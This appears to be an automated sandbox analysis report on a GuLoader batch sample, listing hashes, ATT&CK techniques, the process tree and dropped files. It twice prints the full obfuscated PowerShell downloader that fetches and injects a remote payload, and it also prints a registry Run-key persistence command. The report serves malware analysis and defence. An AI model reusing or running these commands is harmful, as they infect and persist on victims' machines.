guloader | acf265447a05d1483e012d7051cfe22f336146b2cff6218453440923fd6d8c83

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-06-2024 01:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

acf265447a05d1483e012d7051cfe22f336146b2cff6218453440923fd6d8c83.bat
Size

7KB
MD5

e10969ce40099c5ac570b221d3ec6517
SHA1

c1c2f30a7e7bfede1608e27cbe925f09525e1459
SHA256

acf265447a05d1483e012d7051cfe22f336146b2cff6218453440923fd6d8c83
SHA512

d7c3785b4098cf2a45f08cbfe7a5a0e272d2f02e273f2b05da9d050d01019fad671a3fdd9a6c710434c9f43a141a6154bcce64dcface6696ca173ab23ee30923
SSDEEP

192:3+g9OFNNtGLqR4AifzVZrlhddjQEXpdq6P1zoK/J8e7I63iLAn:OZFRG1AibRdjQEXaSBx8ypn

Score

10^/10

guloader downloader execution persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 3028 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3028 powershell.exe

flow	pid	process
5	3028	powershell.exe

pid	process
3028	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Dorthies = "%sabbatshvilen% -w 1 $Nitrifiable=(Get-ItemProperty -Path 'HKCU:\\Bedrevne\\').Elevraadsmdet;%sabbatshvilen% ($Nitrifiable)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

2992 wab.exe
2992 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2488 powershell.exe
2992 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2488 set thread context of 2992 2488 powershell.exe wab.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2796 reg.exe
Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

3028 powershell.exe
2488 powershell.exe
2488 powershell.exe
2992 wab.exe
2992 wab.exe
2992 wab.exe
2992 wab.exe
2992 wab.exe
2992 wab.exe
2992 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2488 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3028 powershell.exe
Token: SeDebugPrivilege 2488 powershell.exe

pid	process
2992	wab.exe
2992	wab.exe

pid	process
2488	powershell.exe
2992	wab.exe

description	pid	process	target process
PID 2488 set thread context of 2992	2488	powershell.exe	wab.exe

pid	process
2796	reg.exe

pid	process
3028	powershell.exe
2488	powershell.exe
2488	powershell.exe
2992	wab.exe
2992	wab.exe
2992	wab.exe
2992	wab.exe
2992	wab.exe
2992	wab.exe
2992	wab.exe

pid	process
2488	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

cmd.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 2320 wrote to memory of 3028	2320	cmd.exe	powershell.exe
PID 2320 wrote to memory of 3028	2320	cmd.exe	powershell.exe
PID 2320 wrote to memory of 3028	2320	cmd.exe	powershell.exe
PID 3028 wrote to memory of 2652	3028	powershell.exe	cmd.exe
PID 3028 wrote to memory of 2652	3028	powershell.exe	cmd.exe
PID 3028 wrote to memory of 2652	3028	powershell.exe	cmd.exe
PID 3028 wrote to memory of 2488	3028	powershell.exe	powershell.exe
PID 3028 wrote to memory of 2488	3028	powershell.exe	powershell.exe
PID 3028 wrote to memory of 2488	3028	powershell.exe	powershell.exe
PID 3028 wrote to memory of 2488	3028	powershell.exe	powershell.exe
PID 2488 wrote to memory of 2716	2488	powershell.exe	cmd.exe
PID 2488 wrote to memory of 2716	2488	powershell.exe	cmd.exe
PID 2488 wrote to memory of 2716	2488	powershell.exe	cmd.exe
PID 2488 wrote to memory of 2716	2488	powershell.exe	cmd.exe
PID 2488 wrote to memory of 2992	2488	powershell.exe	wab.exe
PID 2488 wrote to memory of 2992	2488	powershell.exe	wab.exe
PID 2488 wrote to memory of 2992	2488	powershell.exe	wab.exe
PID 2488 wrote to memory of 2992	2488	powershell.exe	wab.exe
PID 2488 wrote to memory of 2992	2488	powershell.exe	wab.exe
PID 2488 wrote to memory of 2992	2488	powershell.exe	wab.exe
PID 2992 wrote to memory of 2832	2992	wab.exe	cmd.exe
PID 2992 wrote to memory of 2832	2992	wab.exe	cmd.exe
PID 2992 wrote to memory of 2832	2992	wab.exe	cmd.exe
PID 2992 wrote to memory of 2832	2992	wab.exe	cmd.exe
PID 2832 wrote to memory of 2796	2832	cmd.exe	reg.exe
PID 2832 wrote to memory of 2796	2832	cmd.exe	reg.exe
PID 2832 wrote to memory of 2796	2832	cmd.exe	reg.exe
PID 2832 wrote to memory of 2796	2832	cmd.exe	reg.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\acf265447a05d1483e012d7051cfe22f336146b2cff6218453440923fd6d8c83.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "cls;write 'Lunke Adstringerende Typograferet Merianernes Abonnementsfunktionen Dueller Paadrages Lavprisvarehusets babyliften Hithertoward';$Sengestolpens = 1;Function metadiabase($Fordeal){$Amenance=$Fordeal.Length-$Sengestolpens;$brnetjs='SUBSTRIN';$brnetjs+='G';For( $Luderne=5;$Luderne -lt $Amenance;$Luderne+=6){$Lunke+=$Fordeal.$brnetjs.Invoke( $Luderne, $Sengestolpens);}$Lunke;}function Lapcock($noninfusibness){ & ($afkastningsgraden) ($noninfusibness);}$Ngtelser=metadiabase ' muniM DeeroGastrzUnplaiFrstel FortlStempaAfson/Eucal5Fitzc.Aarhu0R,tte Macro(electWUgli i Su,enL.kfjdKatodoProfew Jo.dsUnaer HelbeNprotoTfarup budge1.vers0Un.ol.Ka an0Ek po;Relap TraveW,atrii retanAperc6Delpr4Brems; Rom. kaemxObse 6Stand4Accur; frai ,irkerVarevv S,og:Stylt1Udrej2Socia1timo..,edal0Papil)Cleuk XenogG Arc.e H.vacVr,lekLoricoMilie/ Bes.2 Slee0Samme1 Temp0f.nkt0Opfan1 Af e0Spast1Vomme KongFIntariGrav r,nglaeUn.erfpal.eoK allxUnh,a/Manua1safeg2mixer1Ulovm.Distr0Reint ';$Svveflyenes213=metadiabase 'Fad eU SpdbsKarbue Euphr Bisa- St,nAfj.rdg Ka,ieAnstanForsetTermi ';$Abonnementsfunktionen=metadiabase 'IsbryhinvaltBrutetDoitepProna:Dis.r/ Pr,c/DireckGarniaLu.gerKadavoFora.oDatatn pinepKnudecForre. Fuldc Doraochu dmSkri /IblanDV,pste erfecCalibcPr vaaWasqusomp.atAlarmaStrontSalgsiAmphioBema.nIntaceForharVoyagsbambo.Oo ynmTaabesTiosui Emeu ';$tabuleringernes=metadiabase ' Bost>Illeg ';$afkastningsgraden=metadiabase ' Tilsi SceneTarmrxBetto ';$Prcedensers='Lavprisvarehusets';$Serviceberry40 = metadiabase 'Remise Fer,c I idhRuentoDds.g Haan.%cong,aPhy lpMithep destdAppl aDa aitInitia.ccen%Gogop\Ti,sii Pe snTyn.seUbi,ux HexatSe iqedegr,n Id.ms .rueiSpa ebInfeli Tit,lTechniDelfit.taniyAdre..C.mitPDessia Hi.mrKalk. Ju.as&Bra e&Embed Ef,ereParticLogiehSpiseoUdsyn cochtIonos ';Lapcock (metadiabase ' Yest$SukkegPaatrlSu.keoSphecblageraD,serlG ost:BengtN PebeoKn pbn FletsStr tp Bee,i,evsknDeadsoCofous FriseSk,helValbyyTeks = Stag( Rellc.krinmAnhedd aver Ov rr/CoadmcBlokd Sk,l$JavanS Top eBofforHausavAn.epiU,lercInd,reKloa,b DelaePiercr,ihuerPupaey Anal4 fodb0Restu)for,e ');Lapcock (metadiabase 'Charl$Boog.gAppellKoke oAdaptbBuskmaVaretlPaahl:TraadMLy.nse Til rVenguiOliv.aDvrgen Ibsee Un erK,ammnC.ntdeLi.gvsJoggi=Unres$Beta Asemi bunr.fo Monon ObsenBoggaeUundgmGastreTypennEntret spars vitifFladbuOpposnExsa kjubilt C.rkiReageoLandbnUnliteSerennBorge.Bar,esRetorpSponglS.rgeiAll.ctPulli(Sma.d$OutlytSalgsaTllevbUnp,vuSlap lMorskeStrucrAutotiUndernVigregFjernehaerfrForelnJun he,irdesBitto)Forsy ');Lapcock (metadiabase 'Kde t[pitieNA romeScriptFa.ve. BiomSSpinde,tnkerHur.lv VarmiSang,cRevolebasigPMontroKu usibrdden St rtTileeMRadmaaUndernD bita Su rgPlat ekommurtilsm]ekspe:U rli: W ndSVokseepar,lc Co.guExoserRumsti .etttFjel.yPers,P HybrrSewero amletCoineo piercTilsto Fi elTonom Begra=Finde Wy ta[OutdrNGangleVa,elt Susu.Lr,stSRe.iee LubccPuljeu Momsr PrveibaraztLysegyRepl,PudhngrKonveosup rtBredboDow,bcst.rkoDrawelSkr.kTFove.yfrisppUnkineUniv ]br.nd:Uncos: onomTUnde,lWinessStyrt1Socio2 File ');$Abonnementsfunktionen=$Merianernes[0];$Benchership= (metadiabase 'Under$Lullig AncilTeks.oreconbOu,coaSammelAfsej:UnintoLyrikuPja.kt Sungrooecii BeskbId.lebBebotilssernClassg ardd=HrelsNKla ienoncawY ded-FngseOGldstb.devaj Afgoe D.mbcAfdrotSampa BundsSMu cuyEkspls Ba,itSapo eHovedmUnca . Cyp.NBlodbeMumbltTes.a.NazarWUnquieVarskbValduC RapplDespoiTenteekontrnReno t');$Benchership+=$Nonspinosely[1];Lapcock ($Benchership);Lapcock (metadiabase ' Sp.o$Afsmio FrikuFij,at,emflr ,ordiHosenbTilvrb R.kei.pilonHypergfrict.KakatHLiflieVriknaMajond,nquoeUdkryrMicrosHyrer[ Fors$Ca atSMicr,vMask,vPoetieExtrafMoravlGanglyDisb e UndenSuc ie FarbsUdsig2Tyler1 T te3K,ing] Vana= Tr.m$PermuNTran gErobrtCit.ieHandllHo sesSwel.eJerrerW,tli ');$Climatolog59=metadiabase 'Multi$ RailoPrea u H.mat CaisrLokaliT.manbSabotbLa eri andbnApo tgEndop. EquiDPawawoT.pmawProxin omplsubiyoBygakaBabbldVexilFD,mpniProaglHilloeRever(Claus$FerieA SortbPomivoprecon flaan SurceDegram AandeGelatnAlaudt.nextsUnvigfTryk uda.nsnOver kUterutJulesiUf jloHyd inBrokketrakknHj pe,kasse$PlaneWCavith Retoi CoxomPetresBespie lydsy BeslsVe.ar)Fa ee ';$Whimseys=$Nonspinosely[0];Lapcock (metadiabase '.atab$AmatrgCom el Sofao At rbNec,sa FodvlFlapp:ElbowLProxiaSnou,t GambiKortsnT,lsleUformrAffr.eBristn .eep=Flin.(FlugtTLaureeLogomsByggetAmt.l-DebelPFerulaMa.eftRyolfh Com Siest$ToadiW ru dhHelseiR,dobmPsychsUov reShoweyCrap,sAuroc) Taab ');while (!$Latineren) {Lapcock (metadiabase ' Virk$CykelgHarmolDiscioStoneb eldiaGareklStret:MesseMpriski nebosSporoh ,ivea ,ontgSerafsNoter=Inter$ButtetD narrBura,uDeceneFaggr ') ;Lapcock $Climatolog59;Lapcock (metadiabase 'NavneSpermit EvanaMjsomrUnb,otDiese-Na htSCabbalOmbude BasteChaptp.nsea Fes i4 .nte ');Lapcock (metadiabase ' Metr$GerlagKlonglUnaboo UspobPhormaBourglCount:A bejLPleioaHi.tot rundiMouthn Blege reinrSandbe skytn elvu= Semi(StraaTPal eeLaanesGalactPytha-Nrbi.P Eer.aPsychtde adhRootw Lango$Omsa WShutohRanaciRekvimMeninsbemgteNonseydataksZo.ce) God. ') ;Lapcock (metadiabase 'Lemfl$brneog PakvlLu,keoMishnbEkspraSelvbl Sknh:SprecTO,ergyEmaljpTrn toSavfigUn,rorTergiaPlotif BrndeAfl.crb aase IneftForsk=Rhabd$Opgang Ph.slTan,boAccepb.mphoaTumbolImpar:Unan,A .ubgd.hirts FremtGuararK,rdiiPi senTautogCaneleE zymrK,erne jordn Tra,d Gr,vemonos+samme+Swadd%O.ers$MediaMShe.aeElectr Mil i LaboaVinylnHej.eeTallerdo.benhaditeIndbasThist.K nfocStoddoMegaluUnsinn G,yctWilmi ') ;$Abonnementsfunktionen=$Merianernes[$Typograferet];}$Cedertrernes=310097;$Fusoid=30197;Lapcock (metadiabase 'Henla$Ble.fgLea.elRundloBryskbHaireaPro.elUntim:SkrmmbSpndtaHamarbI,neryL rdslNamepiEst.mfHeathtIn.tiePraktnPlads Hoses=Damer P,rsoG SortePinctt Sn.p-SanseCAllokosl dsn HelttElinseraakin LntatG.asf Dr ll$Dish WIndskhSta,tiGuruemConvesKle teOrdstyPrvessKonst ');Lapcock (metadiabase ',mper$RaccogHaliblDiscooOrganb,mpstaSlugtlDisan: LnniU Vaa d avols Overl AnisiF rtrdCalvitundev9 Anci8 pyra proph=Spejd Trosk[AkrotSEvecty,rtissOrthotsulfie SnavmTick . AmmoC StdeoDisk,nAerosv NonbeNecesrtr.mptOcclu]Ek,kl:Inter:LightF In urSpi,loPrimrmCompoB EmbaaMunsisTin.se Fylk6Subbr4LanthSAcceltBrevsrModeriF rsvnMaringSixgu(Geneo$FieldbTilseaUnderb Ich yBe.halOverbiPeni,fForegtStuggeaquafnLitur) Dir ');Lapcock (metadiabase 'Gliri$skjorgDummel Und oProagbArtsbaHematlR.mel:Afri TStbe.eInfarg etanSlattsForlbt A bir To.nrCathreEx,rilIcebosforsbeBrnevn odsv Unsi=Sregn Wacky[ OpslSbenjaysubo,sSgeprtTest eV,deom,ludf.Ret,rTSkatteRenunxMddint Blge.Ring,E SelvnEquivc.olypoAlephdArbejiTalksnur.ehgbgetr] Suba: Sent:FugtsAT.rifS .mklCnonplIGr,nkI Mips.SuperGTaxoleStat,t D taSBindit Skolr LaboiMaw.lnRoyalgHous,(Lumin$Fill.UPou ddLaures UplalBeachiPromudSubt tNonel9Int r8Tinge)tapli ');Lapcock (metadiabase 'Miske$Dent gSki.plPostwoA,rinbreseraudtrelOvers:En heKPortho ellenpl,jetJargor nisoaSibylsIntertReacceD.mhur CongeSlutttEfter=Quive$UnderTPantoeSolskgCaba.nPothesKi,ketForharDep,trFrdigeStilelIta.isA,giseperipn.lang.F,ammsSp,ceuT.itabEnt.psPeriftRenskrQuadriSkospnP.ilogTovt.(Mar.u$,iffeCFrekveMultidRosete NonprBoot,tC,ntarEvaluetal.hrBarranShukueunmals str,, semi$Fri,aFUny cuFle ss G nio Homei GravdFa,ri)Laryn ');Lapcock $Kontrasteret;"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\inextensibility.Par && echo t"
3⤵
PID:2652

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Lunke Adstringerende Typograferet Merianernes Abonnementsfunktionen Dueller Paadrages Lavprisvarehusets babyliften Hithertoward';$Sengestolpens = 1;Function metadiabase($Fordeal){$Amenance=$Fordeal.Length-$Sengestolpens;$brnetjs='SUBSTRIN';$brnetjs+='G';For( $Luderne=5;$Luderne -lt $Amenance;$Luderne+=6){$Lunke+=$Fordeal.$brnetjs.Invoke( $Luderne, $Sengestolpens);}$Lunke;}function Lapcock($noninfusibness){ & ($afkastningsgraden) ($noninfusibness);}$Ngtelser=metadiabase ' muniM DeeroGastrzUnplaiFrstel FortlStempaAfson/Eucal5Fitzc.Aarhu0R,tte Macro(electWUgli i Su,enL.kfjdKatodoProfew Jo.dsUnaer HelbeNprotoTfarup budge1.vers0Un.ol.Ka an0Ek po;Relap TraveW,atrii retanAperc6Delpr4Brems; Rom. kaemxObse 6Stand4Accur; frai ,irkerVarevv S,og:Stylt1Udrej2Socia1timo..,edal0Papil)Cleuk XenogG Arc.e H.vacVr,lekLoricoMilie/ Bes.2 Slee0Samme1 Temp0f.nkt0Opfan1 Af e0Spast1Vomme KongFIntariGrav r,nglaeUn.erfpal.eoK allxUnh,a/Manua1safeg2mixer1Ulovm.Distr0Reint ';$Svveflyenes213=metadiabase 'Fad eU SpdbsKarbue Euphr Bisa- St,nAfj.rdg Ka,ieAnstanForsetTermi ';$Abonnementsfunktionen=metadiabase 'IsbryhinvaltBrutetDoitepProna:Dis.r/ Pr,c/DireckGarniaLu.gerKadavoFora.oDatatn pinepKnudecForre. Fuldc Doraochu dmSkri /IblanDV,pste erfecCalibcPr vaaWasqusomp.atAlarmaStrontSalgsiAmphioBema.nIntaceForharVoyagsbambo.Oo ynmTaabesTiosui Emeu ';$tabuleringernes=metadiabase ' Bost>Illeg ';$afkastningsgraden=metadiabase ' Tilsi SceneTarmrxBetto ';$Prcedensers='Lavprisvarehusets';$Serviceberry40 = metadiabase 'Remise Fer,c I idhRuentoDds.g Haan.%cong,aPhy lpMithep destdAppl aDa aitInitia.ccen%Gogop\Ti,sii Pe snTyn.seUbi,ux HexatSe iqedegr,n Id.ms .rueiSpa ebInfeli Tit,lTechniDelfit.taniyAdre..C.mitPDessia Hi.mrKalk. Ju.as&Bra e&Embed Ef,ereParticLogiehSpiseoUdsyn cochtIonos ';Lapcock (metadiabase ' Yest$SukkegPaatrlSu.keoSphecblageraD,serlG ost:BengtN PebeoKn pbn FletsStr tp Bee,i,evsknDeadsoCofous FriseSk,helValbyyTeks = Stag( Rellc.krinmAnhedd aver Ov rr/CoadmcBlokd Sk,l$JavanS Top eBofforHausavAn.epiU,lercInd,reKloa,b DelaePiercr,ihuerPupaey Anal4 fodb0Restu)for,e ');Lapcock (metadiabase 'Charl$Boog.gAppellKoke oAdaptbBuskmaVaretlPaahl:TraadMLy.nse Til rVenguiOliv.aDvrgen Ibsee Un erK,ammnC.ntdeLi.gvsJoggi=Unres$Beta Asemi bunr.fo Monon ObsenBoggaeUundgmGastreTypennEntret spars vitifFladbuOpposnExsa kjubilt C.rkiReageoLandbnUnliteSerennBorge.Bar,esRetorpSponglS.rgeiAll.ctPulli(Sma.d$OutlytSalgsaTllevbUnp,vuSlap lMorskeStrucrAutotiUndernVigregFjernehaerfrForelnJun he,irdesBitto)Forsy ');Lapcock (metadiabase 'Kde t[pitieNA romeScriptFa.ve. BiomSSpinde,tnkerHur.lv VarmiSang,cRevolebasigPMontroKu usibrdden St rtTileeMRadmaaUndernD bita Su rgPlat ekommurtilsm]ekspe:U rli: W ndSVokseepar,lc Co.guExoserRumsti .etttFjel.yPers,P HybrrSewero amletCoineo piercTilsto Fi elTonom Begra=Finde Wy ta[OutdrNGangleVa,elt Susu.Lr,stSRe.iee LubccPuljeu Momsr PrveibaraztLysegyRepl,PudhngrKonveosup rtBredboDow,bcst.rkoDrawelSkr.kTFove.yfrisppUnkineUniv ]br.nd:Uncos: onomTUnde,lWinessStyrt1Socio2 File ');$Abonnementsfunktionen=$Merianernes[0];$Benchership= (metadiabase 'Under$Lullig AncilTeks.oreconbOu,coaSammelAfsej:UnintoLyrikuPja.kt Sungrooecii BeskbId.lebBebotilssernClassg ardd=HrelsNKla ienoncawY ded-FngseOGldstb.devaj Afgoe D.mbcAfdrotSampa BundsSMu cuyEkspls Ba,itSapo eHovedmUnca . Cyp.NBlodbeMumbltTes.a.NazarWUnquieVarskbValduC RapplDespoiTenteekontrnReno t');$Benchership+=$Nonspinosely[1];Lapcock ($Benchership);Lapcock (metadiabase ' Sp.o$Afsmio FrikuFij,at,emflr ,ordiHosenbTilvrb R.kei.pilonHypergfrict.KakatHLiflieVriknaMajond,nquoeUdkryrMicrosHyrer[ Fors$Ca atSMicr,vMask,vPoetieExtrafMoravlGanglyDisb e UndenSuc ie FarbsUdsig2Tyler1 T te3K,ing] Vana= Tr.m$PermuNTran gErobrtCit.ieHandllHo sesSwel.eJerrerW,tli ');$Climatolog59=metadiabase 'Multi$ RailoPrea u H.mat CaisrLokaliT.manbSabotbLa eri andbnApo tgEndop. EquiDPawawoT.pmawProxin omplsubiyoBygakaBabbldVexilFD,mpniProaglHilloeRever(Claus$FerieA SortbPomivoprecon flaan SurceDegram AandeGelatnAlaudt.nextsUnvigfTryk uda.nsnOver kUterutJulesiUf jloHyd inBrokketrakknHj pe,kasse$PlaneWCavith Retoi CoxomPetresBespie lydsy BeslsVe.ar)Fa ee ';$Whimseys=$Nonspinosely[0];Lapcock (metadiabase '.atab$AmatrgCom el Sofao At rbNec,sa FodvlFlapp:ElbowLProxiaSnou,t GambiKortsnT,lsleUformrAffr.eBristn .eep=Flin.(FlugtTLaureeLogomsByggetAmt.l-DebelPFerulaMa.eftRyolfh Com Siest$ToadiW ru dhHelseiR,dobmPsychsUov reShoweyCrap,sAuroc) Taab ');while (!$Latineren) {Lapcock (metadiabase ' Virk$CykelgHarmolDiscioStoneb eldiaGareklStret:MesseMpriski nebosSporoh ,ivea ,ontgSerafsNoter=Inter$ButtetD narrBura,uDeceneFaggr ') ;Lapcock $Climatolog59;Lapcock (metadiabase 'NavneSpermit EvanaMjsomrUnb,otDiese-Na htSCabbalOmbude BasteChaptp.nsea Fes i4 .nte ');Lapcock (metadiabase ' Metr$GerlagKlonglUnaboo UspobPhormaBourglCount:A bejLPleioaHi.tot rundiMouthn Blege reinrSandbe skytn elvu= Semi(StraaTPal eeLaanesGalactPytha-Nrbi.P Eer.aPsychtde adhRootw Lango$Omsa WShutohRanaciRekvimMeninsbemgteNonseydataksZo.ce) God. ') ;Lapcock (metadiabase 'Lemfl$brneog PakvlLu,keoMishnbEkspraSelvbl Sknh:SprecTO,ergyEmaljpTrn toSavfigUn,rorTergiaPlotif BrndeAfl.crb aase IneftForsk=Rhabd$Opgang Ph.slTan,boAccepb.mphoaTumbolImpar:Unan,A .ubgd.hirts FremtGuararK,rdiiPi senTautogCaneleE zymrK,erne jordn Tra,d Gr,vemonos+samme+Swadd%O.ers$MediaMShe.aeElectr Mil i LaboaVinylnHej.eeTallerdo.benhaditeIndbasThist.K nfocStoddoMegaluUnsinn G,yctWilmi ') ;$Abonnementsfunktionen=$Merianernes[$Typograferet];}$Cedertrernes=310097;$Fusoid=30197;Lapcock (metadiabase 'Henla$Ble.fgLea.elRundloBryskbHaireaPro.elUntim:SkrmmbSpndtaHamarbI,neryL rdslNamepiEst.mfHeathtIn.tiePraktnPlads Hoses=Damer P,rsoG SortePinctt Sn.p-SanseCAllokosl dsn HelttElinseraakin LntatG.asf Dr ll$Dish WIndskhSta,tiGuruemConvesKle teOrdstyPrvessKonst ');Lapcock (metadiabase ',mper$RaccogHaliblDiscooOrganb,mpstaSlugtlDisan: LnniU Vaa d avols Overl AnisiF rtrdCalvitundev9 Anci8 pyra proph=Spejd Trosk[AkrotSEvecty,rtissOrthotsulfie SnavmTick . AmmoC StdeoDisk,nAerosv NonbeNecesrtr.mptOcclu]Ek,kl:Inter:LightF In urSpi,loPrimrmCompoB EmbaaMunsisTin.se Fylk6Subbr4LanthSAcceltBrevsrModeriF rsvnMaringSixgu(Geneo$FieldbTilseaUnderb Ich yBe.halOverbiPeni,fForegtStuggeaquafnLitur) Dir ');Lapcock (metadiabase 'Gliri$skjorgDummel Und oProagbArtsbaHematlR.mel:Afri TStbe.eInfarg etanSlattsForlbt A bir To.nrCathreEx,rilIcebosforsbeBrnevn odsv Unsi=Sregn Wacky[ OpslSbenjaysubo,sSgeprtTest eV,deom,ludf.Ret,rTSkatteRenunxMddint Blge.Ring,E SelvnEquivc.olypoAlephdArbejiTalksnur.ehgbgetr] Suba: Sent:FugtsAT.rifS .mklCnonplIGr,nkI Mips.SuperGTaxoleStat,t D taSBindit Skolr LaboiMaw.lnRoyalgHous,(Lumin$Fill.UPou ddLaures UplalBeachiPromudSubt tNonel9Int r8Tinge)tapli ');Lapcock (metadiabase 'Miske$Dent gSki.plPostwoA,rinbreseraudtrelOvers:En heKPortho ellenpl,jetJargor nisoaSibylsIntertReacceD.mhur CongeSlutttEfter=Quive$UnderTPantoeSolskgCaba.nPothesKi,ketForharDep,trFrdigeStilelIta.isA,giseperipn.lang.F,ammsSp,ceuT.itabEnt.psPeriftRenskrQuadriSkospnP.ilogTovt.(Mar.u$,iffeCFrekveMultidRosete NonprBoot,tC,ntarEvaluetal.hrBarranShukueunmals str,, semi$Fri,aFUny cuFle ss G nio Homei GravdFa,ri)Laryn ');Lapcock $Kontrasteret;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2488

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\inextensibility.Par && echo t"
4⤵
PID:2716

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dorthies" /t REG_EXPAND_SZ /d "%sabbatshvilen% -w 1 $Nitrifiable=(Get-ItemProperty -Path 'HKCU:\Bedrevne\').Elevraadsmdet;%sabbatshvilen% ($Nitrifiable)"
5⤵
- Suspicious use of WriteProcessMemory
PID:2832

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dorthies" /t REG_EXPAND_SZ /d "%sabbatshvilen% -w 1 $Nitrifiable=(Get-ItemProperty -Path 'HKCU:\Bedrevne\').Elevraadsmdet;%sabbatshvilen% ($Nitrifiable)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:2796

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7XJZJ7551ZJIDLC3B5RE.temp
Filesize
7KB

MD5
f1c1c64093370807cb543148ffc652cc

SHA1
95310f0dd7356135ad5a6ade031ce60605461501

SHA256
2cbb578d3dfcd2d469bcba91cc60ddebe4574ec0b62a7f111f3860c3fc6f1ed2

SHA512
4ba492b56b7c9297f3ac87bcfcdaebee6c0282ab6d2a397c1380508548ef0d4cd271a984db8c9a4a9044b0aa4c455b6f458ef11e1d8b0f410e757ea9d0f018a4

Download Submit
C:\Users\Admin\AppData\Roaming\inextensibility.Par
Filesize
443KB

MD5
5144f4f71644edb5f191e12264318c87

SHA1
09a72b5870726be33efb1bcf6018e3d68872cc6d

SHA256
403f98abad4a3d681466b21dc3e31eb1b37ef8ca34d6f15db675b9260efe0993

SHA512
977f10a82de75fc841040d96e3e343f7607427470aa69d6d5c365d97e34d8595120932eb52a65d48199816c1a16054c0bca2f18e13da8acfe8679d9da4a87e9a

Download Submit
memory/2488-17-0x0000000006580000-0x000000000A4C1000-memory.dmp

Filesize
63.3MB

Download
memory/2992-30-0x0000000000EE0000-0x0000000004E21000-memory.dmp

Filesize
63.3MB

Download
memory/2992-24-0x0000000000EE0000-0x0000000004E21000-memory.dmp

Filesize
63.3MB

Download
memory/2992-21-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/3028-8-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/3028-11-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/3028-10-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/3028-9-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/3028-4-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp

Filesize
4KB

Download
memory/3028-18-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/3028-19-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp

Filesize
4KB

Download
memory/3028-6-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download
memory/3028-7-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/3028-25-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/3028-5-0x000000001B460000-0x000000001B742000-memory.dmp

Filesize
2.9MB

Download